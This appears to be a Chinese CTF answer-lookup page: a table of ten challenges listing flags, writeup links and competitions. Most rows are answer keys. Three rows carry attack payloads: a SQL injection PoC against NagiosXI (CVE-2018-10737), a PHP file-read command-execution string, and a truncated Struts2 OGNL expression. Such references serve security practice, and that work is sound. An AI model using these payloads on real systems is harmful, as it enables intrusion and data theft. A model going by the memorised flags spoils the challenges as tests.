[标题搜索]只能搜索题目标题,[综合搜索]支持多关键词多项目搜索(以空格分隔)。
| 序号 | Website | Type | Title | Value | Writeup | Competition | Id |
|---|---|---|---|---|---|---|---|
| 1 | bugku | Crypto | strange curve | flag{b7f209df-1284-4bdf-b030-28197483c47b} | ... | 巅峰极客2022 | 1423 |
| 2 | XCTF | Web | babyweb | cyberpeace{add9262aadfefef43f74bc1315c441aa} | https://www.cnblogs.com/Antoniiiia/p/18868884 | 国赛华东北 | 9280 |
| 3 | BUUCTF | Real | [struts2]s2-012 | 无 | 验证后的网址 %{#a=(new... | struts2 | 7452 |
| 4 | BUUCTF | Misc | [WUSTCTF2020]girlfriend | flag{youaremygirlfriends} | https://cloud.tencent.com/developer/a... | WUSTCTF2020 | 7728 |
| 5 | qsnctf | WEB | YWB_Web_命令执行 | echo base64_encode(file_get_contents("fl"."ag.p"."hp")); | https://blog.csdn.net/wyjcxyyy/articl... | 2025御网杯线下 | 5548 |
| 6 | vulfocus | WEB | nagiosxi SQL注入 (CVE-2018-10737) | NagiosXI <= 5.4.12 存在 SQL 注入漏洞(CVE-2018-10737),攻击者可通过 admin/logbook.php 的 txtSearch 参数执行任意 SQL 命令。受影响版本为 5.2.x 和 5.4.x(<5.4.13),修复方法为升级至 5.4.13 或以上版本。漏洞 PoC 示例为: POST /nagiosql/admin/logbook.php txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 验证后的网址为:https://www.seebug.org/vuldb/ssvid-97267 | https://www.seebug.org/vuldb/ssvid-97267 | - | 16622 |
| 7 | NSSCTF | CRYPTO | [HNCTF 2022 WEEK2]S1mple_ECB | NSSCTF{ECB_m0de_qu1te_s1mple} | https://blog.csdn.net/Guang_Shi/artic... | HNCTF | 12388 |
| 8 | bugku | Crypto | 强网先锋辅助 | flag{i_am_very_sad_233333333333} | https://hx1997.github.io/2019/05/28/q... | 强网杯2019 | 230 |
| 9 | NSSCTF | SSTI | [LitCTF 2024]一个....池子? | NSSCTF{0ee42dc2-e44b-49b8-b92b-c309306127bd} | https://blog.csdn.net/2301_80243833/a... | LitCTF | 10647 |
| 10 | ctfshow | WEB入门.Laravel专题 | web628 | 无 | https://fallingskies22.github.io/post... | Laravel专题 | 4182 |